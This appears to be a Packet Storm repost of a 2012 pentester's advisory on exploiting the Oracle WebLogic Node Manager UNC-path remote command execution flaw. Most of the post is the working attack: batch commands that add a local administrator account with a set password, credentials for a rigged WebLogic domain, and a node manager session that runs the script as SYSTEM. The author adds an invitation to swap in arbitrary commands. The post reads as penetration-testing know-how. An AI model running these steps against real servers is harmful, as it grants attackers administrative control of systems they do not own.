Exploit the possiblities

Oracle Web Logic Node Manager UNC Path Remote File Execution

Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted Mar 20, 2012
Authored by Darren McDonald

This advisory documents the Oracle Web Logic Node Manager UNC path remote file execution exploitation details.

tags | exploit, remote, web
MD5 | 0397cdbf0f4b9e0235c45f6b90d0137c

Oracle Web Logic Node Manager UNC Path Remote File Execution

Change Mirror Download
Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted by admin on 2012/03/16 Leave a comment (0) Go to comments

Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.

The file traversal one is rubbish as you can’t specify any command line arguments AFAIK (Do tell me if I’m wrong, please).

The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the following…


net user /add wlcetest WLCETest99*
net localgroup administrators /add wlcetest

The username and password for the wl domain is weblogic / w3bl0g1c.

Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.

Here it is in action..

user@host:~$ openssl s_client -connect

+OK Node manager v10.3 started
domain cetest1 \\\share
+OK Current domain set to ‘cetest1′
execscript addlocaladmin.bat
+OK Script ‘addlocaladmin.bat’ executed

Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.

Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique can’t find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?

Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2018 Packet Storm. All rights reserved.

Security Services
Hosting By